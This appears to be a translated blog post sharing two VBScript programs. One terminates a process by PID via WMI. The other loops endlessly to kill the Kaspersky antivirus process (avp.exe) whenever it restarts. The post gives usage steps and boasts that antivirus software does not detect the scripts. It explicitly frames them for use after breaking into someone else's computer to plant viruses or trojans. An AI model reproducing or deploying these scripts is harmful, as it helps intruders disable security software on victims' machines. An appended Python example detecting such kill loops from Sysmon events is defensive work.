Two simple VBS scripts to end a process and prevent it from being started

Source: Internet
Author: User
No class this afternoon, so I hid in my private space and started thinking about some problems. While browsing VBS-related examples, I wrote two small programs, which have a bit of a hacker flavour (in fact, as long as it can be used to "borrow a knife to kill", what software does not have a hacker nature? --!). kill.vbs is used to end a process from cmd, and dis.vbs is used to prevent a process from starting again, running in window mode. Neither of these two scripts is detected and removed by anti-virus software, and they offer some concealment ...... See the code! (' marks a comment)
kill.vbs:
For Each ps In GetObject _
("winmgmts:\\.\root\cimv2:Win32_Process").Instances_ ' this uses WMI scripting; I cannot explain it clearly!
    If ps.Handle = WScript.Arguments(0) Then ' check whether the PID of the process equals the PID passed as the argument
        WScript.Echo ps.Terminate ' if they are equal, terminate the process with the specified PID
    End If
Next
dis.vbs:
Dim y, x ' this line can be omitted ......
Do ' an endless loop; Do ... Loop is the loop body
    Set y = GetObject("winmgmts:\\.\root\cimv2") ' same as above, this also uses Microsoft WMI
    Set x = y.ExecQuery("select * from Win32_Process where name = 'avp.exe'")
    ' The query statement: check whether a process named avp.exe (Kaspersky) exists among the processes
    ' This way, once Kaspersky has been ended by kill.vbs above, it will not start again unless dis.vbs is ended first ......
    For Each i In x
        i.Terminate() ' Kaspersky is terminated immediately after it starts ......
    Next
    WScript.Sleep 1000 ' the interval is missing from the original; 1000 ms is an assumption
Loop
The explanation is clear enough. Let's see how these two scripts are used. I put kill.vbs and dis.vbs in the root of drive C.
Open cmd, enter cd \ to return to the root of drive C, and enter tasklist to view the current system processes. Then write down the PID of the process you want to kill, and enter cscript kill.vbs 2200 to end the process whose PID is 2200! If this process is avp.exe, you can then enter dis.vbs to start dis.vbs and prevent Kaspersky from being started. When dis.vbs is running, only a wscript.exe process entry appears in the Task Manager's process list. Unless that process is ended, Kaspersky cannot be started again.
Once you understand this, then in the future, after intruding into someone else's computer and uploading a virus, Trojan and so on ...... All of the above has been successfully tested by me. To be improved further ......
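
From the monitoring side, the behaviour described above (a watched process ended right after each start while a wscript.exe or cscript.exe process stays alive) can be picked out of process create/terminate telemetry. The following is an added example, not code from the original post; it uses Sysmon event IDs 1 (process creation) and 5 (process terminated), and the tuple layout, thresholds, watch list and sample events are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample events: (seconds, Sysmon event id, image, pid, command line)
# Event 1 = process creation, event 5 = process terminated.
EVENTS = [
    (0, 1, "wscript.exe", 3100, 'wscript.exe "C:\\dis.vbs"'),
    (5, 1, "avp.exe", 2200, "avp.exe"),
    (6, 5, "avp.exe", 2200, ""),
    (40, 1, "avp.exe", 2310, "avp.exe"),
    (41, 5, "avp.exe", 2310, ""),
    (90, 1, "avp.exe", 2425, "avp.exe"),
    (91, 5, "avp.exe", 2425, ""),
    (100, 1, "notepad.exe", 2500, "notepad.exe"),
    (400, 5, "notepad.exe", 2500, ""),
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PROTECTED = {"avp.exe"}  # assumption: image names of security agents to watch


def find_kill_loops(events, max_lifetime=3, min_repeats=3):
    """Alert when a protected process repeatedly exits within max_lifetime
    seconds of starting while at least one script host is still running."""
    started = {}                     # pid -> (start time, image name)
    hosts = {}                       # pid -> command line of live script hosts
    short_lived = defaultdict(list)  # image -> host command lines seen per exit
    for ts, event_id, image, pid, cmdline in sorted(events):
        name = image.lower()
        if event_id == 1:
            started[pid] = (ts, name)
            if name in SCRIPT_HOSTS:
                hosts[pid] = cmdline
        elif event_id == 5:
            hosts.pop(pid, None)
            t0, started_name = started.pop(pid, (None, None))
            if started_name in PROTECTED and ts - t0 <= max_lifetime and hosts:
                short_lived[started_name].append(tuple(hosts.values()))
    alerts = []
    for name, hits in short_lived.items():
        if len(hits) >= min_repeats:
            suspects = sorted({c for host_cmds in hits for c in host_cmds})
            alerts.append({"process": name, "kills": len(hits),
                           "script_hosts": suspects})
    return alerts


if __name__ == "__main__":
    for alert in find_kill_loops(EVENTS):
        print(alert)
```

Termination events do not name the process that issued the kill, so the script-host correlation is a heuristic that points an analyst at the command line to inspect.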
